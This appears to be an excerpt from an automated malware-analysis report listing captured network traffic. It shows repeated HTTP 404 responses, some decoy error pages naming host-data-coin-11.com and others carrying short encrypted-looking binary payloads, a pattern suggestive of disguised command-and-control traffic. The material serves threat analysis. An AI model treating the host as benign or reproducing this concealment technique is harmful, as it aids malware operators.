                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 31 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS1SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 96 d3 08 55 3b 43 be f4 d4 fc fc 43 eb 1e d1 6d bc 19 74 b6 50 a1 b9 70 b8 7b 07 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OU;CCmtPp{P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 30 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS0SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 4c 47 bb 29 c4 b0 66 d3 2f 41 0b ac b7 d9 57 e8 0d 0a 30 0d 0a 0d 0a Data Ascii: 34I:82OTevLG)f/AW0
